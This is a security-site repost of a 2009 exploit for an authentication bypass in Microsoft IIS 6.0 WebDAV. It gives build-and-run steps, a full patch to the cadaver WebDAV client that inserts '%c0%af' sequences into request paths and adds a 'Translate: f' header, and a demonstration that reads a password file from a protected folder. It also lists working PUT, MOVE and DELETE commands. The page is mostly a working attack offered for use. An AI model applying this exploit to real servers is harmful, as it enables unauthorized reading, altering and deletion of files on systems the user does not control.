首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Microsoft IIS 6.0 WebDAV Remote Authentication Bypass Exploit (patch)
来源:vfocus.net 作者:vfocus 发布时间:2009-05-22  
# Blog with a detailed description:
# http://www.skullsecurity.org/blog/?p=285
# 
# And the patch itself:
# http://www.skullsecurity.org/blogdata/cadaver-0.23.2-h4x.patch
#
# > mkdir cadaver-h4x
# > cd cadaver-h4x
# > wget http://www.skullsecurity.org/blogdata/cadaver-0.23.2-h4x.patch
# --snip--
# > wget http://www.webdav.org/cadaver/cadaver-0.23.2.tar.gz
# --snip--
# > tar xzvf cadaver-0.23.2.tar.gz
# --snip--
# > cd cadaver-0.23.2/
# > patch -p1 < ../cadaver-0.23.2-h4x.patch
# patching file lib/neon/ne_basic.c
# patching file lib/neon/ne_request.c
# patching file lib/neon/ne_uri.c
# > ./configure
# --snip--
# > make
# --snip--
#
# Now we should have a patched, compiled version of cadaver, so start it
# up with the server that was identified as having a vulnerable folder
# earlier:
#
# > ./cadaver xxx.xxx.xxx.xxx
#
# This should drop you to a “dav:/>” prompt. Now just cd into the
# vulnerable folder and check out what’s there:
# 
# dav:/> cd secret
# dav:/secret/> ls
# Listing collection `/secret/': succeeded.
#        password.txt                           7  May 19 10:40
# dav:/secret/> cat password.txt
# Displaying `/secret/password.txt':
# ron$pr0ns
# dav:/secret/>
#
# Here’s a list of commands that I’ve tested that work with the patched
# cadaver on a vulnerable folder:
# * CD
# * LS
# * MOVE
# * PUT
# * GET
# * CAT
# * DELETE

diff -rub cadaver-0.23.2/lib/neon/ne_basic.c cadaver-0.23.2-h4x/lib/neon/ne_basic.c
--- cadaver-0.23.2/lib/neon/ne_basic.c	2008-02-07 16:22:07.000000000 -0600
+++ cadaver-0.23.2-h4x/lib/neon/ne_basic.c	2009-05-20 16:13:46.000000000 -0500
@@ -402,7 +402,7 @@
 	value = "infinity";
 	break;
     }
-    ne_add_request_header(req, "Depth", value);
+    ne_add_request_header(req, "Depth", "1");
 }
 
 static int copy_or_move(ne_session *sess, int is_move, int overwrite,
diff -rub cadaver-0.23.2/lib/neon/ne_request.c cadaver-0.23.2-h4x/lib/neon/ne_request.c
--- cadaver-0.23.2/lib/neon/ne_request.c	2008-01-30 05:35:52.000000000 -0600
+++ cadaver-0.23.2-h4x/lib/neon/ne_request.c	2009-05-20 16:35:46.000000000 -0500
@@ -405,6 +405,7 @@
                            "Connection: TE" EOL
                            "TE: trailers" EOL);
     }
+    ne_buffer_czappend(req->headers, "Translate: f" EOL);
 }
 
 int ne_accept_always(void *userdata, ne_request *req, const ne_status *st)
@@ -420,6 +421,7 @@
 ne_request *ne_request_create(ne_session *sess,
 			      const char *method, const char *path) 
 {
+    char *path2 = ne_calloc(strlen(path)+7);
     ne_request *req = ne_calloc(sizeof *req);
 
     req->session = sess;
@@ -435,13 +437,18 @@
     req->method = ne_strdup(method);
     req->method_is_head = (strcmp(method, "HEAD") == 0);
 
+    if(strlen(path)>2)
+        sprintf(path2, "%c%c%%c0%%af%s", path[0], path[1], path+2);
+    else
+        path2 = path;
+
     /* Only use an absoluteURI here when absolutely necessary: some
      * servers can't parse them. */
-    if (req->session->use_proxy && !req->session->use_ssl && path[0] == '/')
+    if (req->session->use_proxy && !req->session->use_ssl && path2[0] == '/')
 	req->uri = ne_concat(req->session->scheme, "://", 
-			     req->session->server.hostport, path, NULL);
+			     req->session->server.hostport, path2, NULL);
     else
-	req->uri = ne_strdup(path);
+	req->uri = ne_strdup(path2);
 
     {
 	struct hook *hk;
diff -rub cadaver-0.23.2/lib/neon/ne_uri.c cadaver-0.23.2-h4x/lib/neon/ne_uri.c
--- cadaver-0.23.2/lib/neon/ne_uri.c	2007-12-05 05:04:47.000000000 -0600
+++ cadaver-0.23.2-h4x/lib/neon/ne_uri.c	2009-05-20 16:13:46.000000000 -0500
@@ -96,7 +96,7 @@
 /* 0xXX    x0      x2      x4      x6      x8      xA      xC      xE     */
 /*   0x */ OT, OT, OT, OT, OT, OT, OT, OT, OT, OT, OT, OT, OT, OT, OT, OT,
 /*   1x */ OT, OT, OT, OT, OT, OT, OT, OT, OT, OT, OT, OT, OT, OT, OT, OT,
-/*   2x */ OT, SD, OT, GD, SD, PC, SD, SD, SD, SD, SD, PS, SD, DS, DT, FS,
+/*   2x */ OT, SD, OT, GD, SD, AL, SD, SD, SD, SD, SD, PS, SD, DS, DT, FS,
 /*   3x */ DG, DG, DG, DG, DG, DG, DG, DG, DG, DG, CL, SD, OT, SD, OT, QU,
 /*   4x */ AT, AL, AL, AL, AL, AL, AL, AL, AL, AL, AL, AL, AL, AL, AL, AL,
 /*   5x */ AL, AL, AL, AL, AL, AL, AL, AL, AL, AL, AL, GD, OT, GD, OT, US,

# [2009-05-21]

 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Mac OS X Java applet Remote De
·VICIDIAL 2.0.5-173 (Auth Bypas
·Jorp 1.3.05.09 Remote Arbitrar
·ASP Inline Corporate Calendar
·bSpeak 1.10 (forumid) Remote B
·BaoFeng (config.dll) ActiveX R
·PHP Article Publisher Arbitrar
·ChinaGames (CGAgent.dll) Activ
·DMXReady Registration Manager
·Flash Quiz Beta 2 Multiple Re
·Realty Web-Base 1.0 (list_list
·Job Script 2.0 Arbitrary Shell
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved